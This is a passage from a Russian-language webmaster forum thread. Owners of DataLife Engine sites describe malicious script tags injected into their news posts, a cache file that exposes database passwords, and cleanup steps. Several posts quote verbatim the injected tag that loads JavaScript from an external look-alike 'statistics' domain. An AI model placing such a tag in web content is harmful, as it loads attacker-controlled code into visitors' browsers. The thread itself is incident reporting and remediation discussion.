оявление постороннего кода в новостях DLE

dakter
На сайте с 08.02.2012
Offline
161
#151
я нашёл отличный скрипт в инете для массовой чистки базы. сделал два варианта - для внедрений типа script и для object

заливаете в корень сайта - запускаете, нажимаете кнопочку и всё - новости чистые.

Сегодня ночью опять в новости код впихнули

<script async=\"async\" type=\"text/javascript\" src=\"http://google-statistics.ru/js/6512bd43d9caa6e02c990b0a82652dca.js\"></script>

И самое интересное что в каждой новости он разный, руками чистить тысячи новостей нереально. Поставил скриптик, запустил, 3 секунды и новости чистые, хорошая вещь.

ProLiant
На сайте с 07.12.2005
Offline
249
#152

Аналогично! Причем часть скрипта 6512bd43d9caa6e02c990b0a82652dca.js везде разная. Также, воспользовался ранее приведенным тут скриптом, все отлично! Еще раз спасибо за него. :)

Но уязвимость остается где-то. ПМА был обновлен до последней версии.

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
dakter
На сайте с 08.02.2012
Offline
161
#153

Все запустилось отлично, а я уже почти волосы на голове стал рвать.

G
На сайте с 03.03.2008
Offline
82
#154
dakter:
Сегодня ночью опять в новости код впихнули

<script async=\"async\" type=\"text/javascript\" src=\"http://google-statistics.ru/js/6512bd43d9caa6e02c990b0a82652dca.js\"></script>

И самое интересное что в каждой новости он разный, руками чистить тысячи новостей нереально. Поставил скриптик, запустил, 3 секунды и новости чистые, хорошая вещь.

Да, сейчас тоже обнаружил эту дрянь на одном из сайтов, но ранее он не был заражен и по нему я не проводил лечение по всем пунктам. У вас ранее этот сайт лечился?

ProLiant
На сайте с 07.12.2005
Offline
249
#155
greatreklam:
Да, сейчас тоже обнаружил эту дрянь на одном из сайтов, но ранее он не был заражен и по нему я не проводил лечение по всем пунктам. У вас ранее этот сайт лечился?

У меня ранее на сегодняшнем сайте тоже не появлялась эта зараза. Но лечение я проводил по всем сайтам, в т.ч. и по этому... Поэтому, уже на 99% уверен, что все наши манипуляции с обновлением Min, заплаткой на оф сайте, сменой паролей, переименовыванием админки, чисткой компа, чисткой кеша, обновлением ПМА - бесполезны.

O4
На сайте с 26.09.2013
Offline
0
#156

После взлома в папке engine/cache/system/ появляется файл с названиям minify_dbconfig.php.js_5cf6c499f8c1dd32450a5bf6981022a5, при чем цифры в конце названия могут быть любыми. В одном из случаев появилось даже два файла. В них и хранятся пароли к БД, его хакер в легкостью сможет прочитать.

Посмотрите у себя.У меня вот так.

dakter
На сайте с 08.02.2012
Offline
161
#157
После взлома в папке engine/cache/system/ появляется файл с названиям minify_dbconfig.php.js_5cf6c499f8c1dd32450a5bf6981022a5, при чем цифры в конце названия могут быть любыми. В одном из случаев появилось даже два файла. В них и хранятся пароли к БД, его хакер в легкостью сможет прочитать.
Посмотрите у себя.У меня вот так.

Такого нет, но есть как-то так:

minify_tabset.js_212e23c50d4922d47798586e59218ddb

minify_highslide.js_e2d0316dedd38426a0bb16cb6c118d81.gz

minify_g=general_059020ae889b0b18ce57154d2adde05c

minify_calendar,tabs,autocomplete,chosen.js_bc9c97ab8a426ca9ee96aac6109cd9f1

ProLiant
На сайте с 07.12.2005
Offline
249
#158

У меня и в прошлые разы такого файлика не было и сейчас тоже пусто...

O4
На сайте с 26.09.2013
Offline
0
#159

Скорее всего у вас его нет из- за того что вы чистите кеш сайта, а так при первом взломе, если не стоит последний баг-фикс этот файл появится.

P1
На сайте с 19.09.2013
Offline
1
#160

ProLiant, попробуйте отключить пма на время и тестируйте.

У меня он отключен.

Также после этого смените пароли не только к самому mysql, но и ко всем пользователям у БД.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий